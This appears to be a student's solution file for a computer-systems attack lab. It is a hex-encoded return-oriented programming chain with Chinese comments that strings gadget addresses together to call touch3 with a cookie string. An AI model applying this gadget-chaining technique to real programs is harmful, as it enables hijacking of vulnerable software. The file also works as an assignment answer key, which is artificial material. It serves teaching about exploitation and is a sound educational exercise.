31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00 /* addval_190 函数 movq %rsp,%rax */
c5 19 40 00 00 00 00 00 /* setval_426 函数 movq %rax,%rdi */
ab 19 40 00 00 00 00 00 /* addval_219 函数 popq %rax */
48 00 00 00 00 00 00 00 /* 偏移量，上一个内存地址到 cookie 地址的偏移量 */
dd 19 40 00 00 00 00 00 /* getval_481 函数 movl %eax,%edx */
34 1a 40 00 00 00 00 00 /* getval_159 函数 movl %edx,%ecx cmp %cl,%cl retq */
13 1a 40 00 00 00 00 00 /* addval_436 函数 movl %ecx,%esi */
d6 19 40 00 00 00 00 00 /* add_xy 函数 lea (%rdi,%rsi,1),%rax */
c5 19 40 00 00 00 00 00 /* setval_426 函数 movq %rax,%rdi */
fa 18 40 00 00 00 00 00 /* touch3 内存地址 */
35 39 62 39 39 37 66 61 /* cookie ASCII 编码的值 */

